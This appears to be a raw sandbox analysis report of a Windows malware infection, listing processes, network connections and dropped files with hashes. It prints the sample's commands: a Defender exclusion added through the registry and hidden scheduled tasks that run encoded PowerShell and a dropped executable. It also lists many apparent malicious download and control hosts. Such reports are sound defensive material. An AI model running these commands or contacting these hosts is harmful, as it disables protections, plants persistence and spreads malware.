"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gnPdzlYCb" /SC once /ST 08:48:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gnPdzlYCb"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 804 -ip 804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1164 -ip 1164
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 12
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn "csrss" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn "ScheduledUpdate" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gnPdzlYCb"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "raBkRkUFhLhqVOsAt" /SC once /ST 05:47:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IIxDORIMmvvtwMVt\hnASLnknHwflCYp\YHiRqDo.exe\" Jd /site_id 525403 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "raBkRkUFhLhqVOsAt"
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe
"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe" Name host ValueOnly True
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 7472 -ip 7472
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 484
Network
| Country | Destination | Domain | Proto |
| NL | 20.190.160.132:443 | tcp | |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 193.233.185.125:80 | tcp | |
| NL | 20.190.160.4:443 | tcp | |
| US | 193.233.185.125:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| IE | 20.50.80.210:443 | tcp | |
| NL | 20.190.160.8:443 | tcp | |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | timetogof.at | udp |
| RU | 185.106.93.10:80 | 185.106.93.10 | tcp |
| US | 8.8.8.8:53 | fdhjtnthdngnd.click | udp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| RU | 193.106.191.246:80 | 193.106.191.246 | tcp |
| US | 8.8.8.8:53 | fantadentalperu.com | udp |
| US | 8.8.8.8:53 | iranparsa-novin.com | udp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| US | 8.8.8.8:53 | maper.info | udp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 2.56.57.65:80 | 2.56.57.65 | tcp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| US | 188.114.96.0:80 | fdhjtnthdngnd.click | tcp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 188.114.96.0:443 | fdhjtnthdngnd.click | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| KR | 211.119.84.112:80 | timetogof.at | tcp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:443 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| IR | 185.88.178.71:443 | iranparsa-novin.com | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| CA | 192.99.207.151:443 | fantadentalperu.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 0310799b411df1c4f1b0f93033ffbddb.clo.footprintdns.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| BR | 191.232.215.149:443 | 0310799b411df1c4f1b0f93033ffbddb.clo.footprintdns.com | tcp |
| KR | 211.119.84.112:80 | timetogof.at | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| NL | 20.190.160.134:443 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| US | 204.79.197.203:80 | api.msn.com | tcp |
| NL | 20.190.160.2:443 | tcp | |
| US | 8.8.8.8:53 | getmut-cleaner.online | udp |
| RU | 176.57.213.135:443 | getmut-cleaner.online | tcp |
| NL | 20.190.160.6:443 | tcp | |
| US | 8.8.8.8:53 | telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 8.8.8.8:53 | checkip.amazonaws.com | udp |
| IE | 52.19.185.150:80 | checkip.amazonaws.com | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| DE | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | ushatamaiet.xyz | udp |
| LV | 94.140.112.166:80 | ushatamaiet.xyz | tcp |
| RU | 94.26.226.51:80 | 94.26.226.51 | tcp |
| US | 8.8.8.8:53 | 4hmn.short.gy | udp |
| DE | 52.59.165.42:443 | 4hmn.short.gy | tcp |
| US | 8.8.8.8:53 | blackhk1.beget.tech | udp |
| US | 8.8.8.8:53 | jollygiunco.com | udp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| RU | 5.101.153.227:80 | blackhk1.beget.tech | tcp |
| RU | 5.101.153.227:80 | blackhk1.beget.tech | tcp |
| US | 8.8.8.8:53 | www.jollygiunco.com | udp |
| RU | 5.101.153.227:80 | blackhk1.beget.tech | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| IT | 31.11.32.193:443 | www.jollygiunco.com | tcp |
| US | 8.8.8.8:53 | webkita.co.id | udp |
| ID | 103.153.3.19:80 | webkita.co.id | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| DE | 148.251.234.93:443 | iplis.ru | tcp |
| NL | 2.56.57.65:80 | 2.56.57.65 | tcp |
| UA | 194.36.177.84:19999 | tcp | |
| ID | 103.153.3.19:80 | webkita.co.id | tcp |
| RU | 193.106.191.81:23196 | tcp | |
| ID | 103.153.3.19:80 | webkita.co.id | tcp |
| ID | 103.153.3.19:80 | webkita.co.id | tcp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 193.233.185.125:80 | tcp | |
| ID | 103.153.3.19:80 | webkita.co.id | tcp |
| DE | 94.130.188.83:80 | 94.130.188.83 | tcp |
| SC | 185.215.113.16:21921 | tcp | |
| ID | 103.153.3.19:80 | webkita.co.id | tcp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 77.88.55.60:443 | yandex.ru | tcp |
| DE | 162.0.217.254:443 | api.2ip.ua | tcp |
| NL | 45.141.237.38:80 | 45.141.237.38 | tcp |
| ID | 103.153.3.19:80 | webkita.co.id | tcp |
| US | 8.8.8.8:53 | monsutiur4.com | udp |
| NL | 185.237.206.60:80 | monsutiur4.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 116.202.4.170:80 | 116.202.4.170 | tcp |
| US | 193.233.185.125:80 | tcp | |
| US | 8.8.8.8:53 | rgyui.top | udp |
| US | 8.8.8.8:53 | acacaca.org | udp |
| KR | 211.171.233.129:80 | acacaca.org | tcp |
| BR | 138.36.3.134:80 | rgyui.top | tcp |
| KR | 211.171.233.129:80 | acacaca.org | tcp |
| DE | 116.202.4.170:80 | 116.202.4.170 | tcp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| SC | 185.215.113.75:81 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | climatejustice.social | udp |
| DE | 167.86.107.75:443 | climatejustice.social | tcp |
| LU | 107.189.11.124:80 | 107.189.11.124 | tcp |
| US | 8.8.8.8:53 | nusurionuy5ff.at | udp |
| US | 8.8.8.8:53 | moroitomo4.net | udp |
| US | 8.8.8.8:53 | susuerulianita1.net | udp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | cucumbetuturel4.com | udp |
| US | 8.8.8.8:53 | nunuslushau.com | udp |
| US | 8.8.8.8:53 | linislominyt11.at | udp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| US | 8.8.8.8:53 | tg8.cllgxx.com | udp |
| US | 8.8.8.8:53 | i.xyzgamei.com | udp |
| US | 8.8.8.8:53 | paisajeeto.in | udp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 188.114.96.0:80 | fdhjtnthdngnd.click | tcp |
| US | 104.21.86.228:80 | i.xyzgamei.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 188.114.96.0:443 | fdhjtnthdngnd.click | tcp |
| US | 104.21.86.228:80 | i.xyzgamei.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 85.209.157.230:80 | tg8.cllgxx.com | tcp |
| US | 104.21.86.228:80 | i.xyzgamei.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 104.21.86.228:443 | i.xyzgamei.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | j.xyzgamej.com | udp |
| US | 104.21.75.107:443 | j.xyzgamej.com | tcp |
| US | 8.8.8.8:53 | paisajeeto.in | udp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| US | 143.198.104.158:80 | tcp | |
| FI | 65.108.27.131:45256 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | v.xyzgamev.com | udp |
| US | 172.67.188.70:443 | v.xyzgamev.com | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| DE | 148.251.234.93:443 | iplis.ru | tcp |
| NL | 45.141.237.38:80 | 45.141.237.38 | tcp |
| US | 8.8.8.8:53 | f00d3193-7630-49d1-9951-20079dee8095.uuid.3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion | udp |
| US | 8.8.8.8:53 | sofolisk.com | udp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| US | 8.8.8.8:53 | ghahantellorb.com | udp |
| LV | 94.140.114.84:80 | ghahantellorb.com | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| DE | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | stun3.l.google.com | udp |
| US | 74.125.204.127:19302 | stun3.l.google.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | sofolisk.com | udp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| DE | 162.0.217.254:443 | api.2ip.ua | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| US | 8.8.8.8:53 | kalitope-ci.com | udp |
| FR | 91.216.107.73:443 | kalitope-ci.com | tcp |
| AT | 140.78.100.23:8443 | tcp | |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| PL | 95.214.54.70:8443 | tcp | |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| DE | 185.220.101.210:443 | tcp | |
| DE | 185.220.101.196:8443 | tcp | |
| SE | 98.128.173.1:9001 | tcp | |
| KR | 211.171.233.129:80 | acacaca.org | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| US | 8.8.8.8:53 | zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc | udp |
| FI | 65.108.213.210:80 | zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| US | 8.8.8.8:53 | amarillavida.com | udp |
| US | 206.221.182.74:443 | amarillavida.com | tcp |
| DE | 185.220.101.210:443 | tcp | |
| SE | 98.128.173.1:9001 | tcp | |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| BR | 138.36.3.134:80 | linislominyt11.at | tcp |
| US | 8.8.8.8:53 | agressivemnaiq.xyz | udp |
| NL | 2.58.149.158:80 | agressivemnaiq.xyz | tcp |
| US | 8.8.8.8:53 | cdn-130.anonfiles.com | udp |
| SE | 45.154.253.59:443 | cdn-130.anonfiles.com | tcp |
| US | 8.8.8.8:53 | anonfiles.com | udp |
| SE | 45.154.253.151:443 | anonfiles.com | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 45.159.251.144:80 | tcp | |
| RU | 185.106.93.10:80 | 185.106.93.10 | tcp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| FI | 65.108.213.210:80 | zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc | tcp |
| US | 8.8.8.8:53 | diewebseite.at | udp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| NL | 2.58.149.158:80 | agressivemnaiq.xyz | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| US | 8.8.8.8:53 | checkip.amazonaws.com | udp |
| IE | 54.72.247.209:80 | checkip.amazonaws.com | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| RU | 89.185.84.2:80 | 89.185.84.2 | tcp |
| US | 8.8.8.8:53 | astrani.com | udp |
| US | 206.221.182.74:80 | astrani.com | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| BG | 151.251.24.5:80 | diewebseite.at | tcp |
| US | 8.8.8.8:53 | s-ring.msedge.net | udp |
| US | 13.107.3.254:443 | s-ring.msedge.net | tcp |
| US | 13.107.3.254:443 | s-ring.msedge.net | tcp |
| US | 131.253.33.200:443 | www.bing.com | tcp |
| RU | 193.233.193.49:11906 | tcp | |
| US | 8.8.8.8:53 | cnSrufvjrfjAHpXtGtICmuqBsaZF.cnSrufvjrfjAHpXtGtICmuqBsaZF | udp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| FI | 65.108.213.210:80 | zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc | tcp |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| RU | 176.124.204.171:8000 | 176.124.204.171 | tcp |
| US | 8.8.8.8:53 | fp-afd.azureedge.net | udp |
| US | 13.107.246.67:443 | fp-afd.azureedge.net | tcp |
| US | 13.107.246.67:443 | fp-afd.azureedge.net | tcp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| US | 172.253.121.127:19302 | stun1.l.google.com | udp |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:31464 | tcp | |
| N/A | 10.127.0.24:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:50358 | tcp | |
| N/A | 10.127.0.24:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:31464 | tcp | |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| N/A | 127.0.0.1:31464 | tcp | |
| FI | 65.108.213.210:80 | zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| FI | 65.108.213.210:80 | zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc | tcp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
Files
memory/3620-130-0x0000000000F50000-0x000000000104A000-memory.dmp
memory/3620-132-0x000000000A3E0000-0x000000000A984000-memory.dmp
memory/4196-133-0x0000000000000000-mapping.dmp
memory/4196-134-0x0000000000400000-0x0000000000438000-memory.dmp
memory/4196-135-0x0000000000400000-0x0000000000438000-memory.dmp
memory/4196-136-0x0000000000400000-0x0000000000438000-memory.dmp
memory/4196-137-0x0000000000400000-0x0000000000438000-memory.dmp
memory/4196-138-0x0000000003BF0000-0x0000000003E73000-memory.dmp
memory/4196-139-0x0000000000400000-0x0000000000438000-memory.dmp
memory/4196-140-0x0000000003BF0000-0x0000000003E73000-memory.dmp
memory/4436-141-0x0000000000000000-mapping.dmp
memory/3704-143-0x0000000000000000-mapping.dmp
memory/4052-142-0x0000000000000000-mapping.dmp
memory/1744-150-0x0000000000000000-mapping.dmp
memory/2948-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
| MD5 | f8d8b67dfcec2684e96122cb9aea4daf |
| SHA1 | 39ea9ffed4bba9db6635b4aa1a38f79d6a9062b7 |
| SHA256 | 083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5 |
| SHA512 | 55405c02c17508250be84461dd527163a53224c34147b51d1dc84d6dd028a6aae5bd8ac9e6be81882fbf2adf9851b2f425e71f9b32ea2df1f2fabfac21fe10c6 |
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
| MD5 | f8d8b67dfcec2684e96122cb9aea4daf |
| SHA1 | 39ea9ffed4bba9db6635b4aa1a38f79d6a9062b7 |
| SHA256 | 083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5 |
| SHA512 | 55405c02c17508250be84461dd527163a53224c34147b51d1dc84d6dd028a6aae5bd8ac9e6be81882fbf2adf9851b2f425e71f9b32ea2df1f2fabfac21fe10c6 |
C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
| MD5 | 45abb1bedf83daf1f2ebbac86e2fa151 |
| SHA1 | 7d9ccba675478ab65707a28fd277a189450fc477 |
| SHA256 | 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f |
| SHA512 | 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c |
C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
| MD5 | 8e6f9cd063f15c66246c1def889860fd |
| SHA1 | 40d75fd878f3103a2949980f48525b8d221c0ed6 |
| SHA256 | 98f2f76e626b55fb471e5e9a830bc64ea4bbae565c3a554fea6970d8ffbede76 |
| SHA512 | c0f44c98480b0540f075b7de4025b1a14fa6020f95372767fa59217656ab64a1f14ecff628c6056434fa19ac39c55e6215b77d79d4d5e68a8a09fd63805e83df |
C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
| MD5 | 45abb1bedf83daf1f2ebbac86e2fa151 |
| SHA1 | 7d9ccba675478ab65707a28fd277a189450fc477 |
| SHA256 | 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f |
| SHA512 | 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c |
memory/1624-165-0x0000000000000000-mapping.dmp
C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
| MD5 | 022300f2f31eb6576f5d92cdc49d8206 |
| SHA1 | abd01d801f6463b421f038095d2f062806d509da |
| SHA256 | 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15 |
| SHA512 | 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe |
C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
| MD5 | 022300f2f31eb6576f5d92cdc49d8206 |
| SHA1 | abd01d801f6463b421f038095d2f062806d509da |
| SHA256 | 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15 |
| SHA512 | 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe |
C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
| MD5 | 8e6f9cd063f15c66246c1def889860fd |
| SHA1 | 40d75fd878f3103a2949980f48525b8d221c0ed6 |
| SHA256 | 98f2f76e626b55fb471e5e9a830bc64ea4bbae565c3a554fea6970d8ffbede76 |
| SHA512 | c0f44c98480b0540f075b7de4025b1a14fa6020f95372767fa59217656ab64a1f14ecff628c6056434fa19ac39c55e6215b77d79d4d5e68a8a09fd63805e83df |
memory/4040-189-0x0000000000400000-0x0000000000885000-memory.dmp
memory/2020-193-0x0000000000000000-mapping.dmp
C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
| MD5 | 5163ae847dec4b423a4e9b1eb43d3864 |
| SHA1 | 15e41ab0f8b44ae83baf879f04e60ff68f5959d1 |
| SHA256 | 4ac6ba19c72728768d7d070d3a00fe605a2a8500f0301b8a42028b702dafd430 |
| SHA512 | 84f9a42bbe81e837836b3eec3440174cfae66087ca8c9339999a52c80f4fcf13d44bec35c60a9d286fa3dfa54d2b48a9e3285de4257a018220294b601f775e2b |
memory/3232-200-0x0000000000F80000-0x00000000011EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI25202\_lzma.pyd
| MD5 | 38c434afb2a885a95999903977dc3624 |
| SHA1 | 57557e7d8de16d5a83598b00a854c1dde952ca19 |
| SHA256 | bfe6e288b2d93905f5cbb6d74e9c0fc37145b9225db6d1f00c0f69eb45afd051 |
| SHA512 | 3e59b79c47cb022d7acec0af164c0225cd83588d5e7f8ca3e8a5dfae27510646391a1b08d86d5ee0b39d1b6bf08409d3758488df3c8cc4d458bed9faab7686e8 |
C:\Users\Admin\AppData\Local\Temp\_MEI25202\pyrogram.cp38-win32.pyd
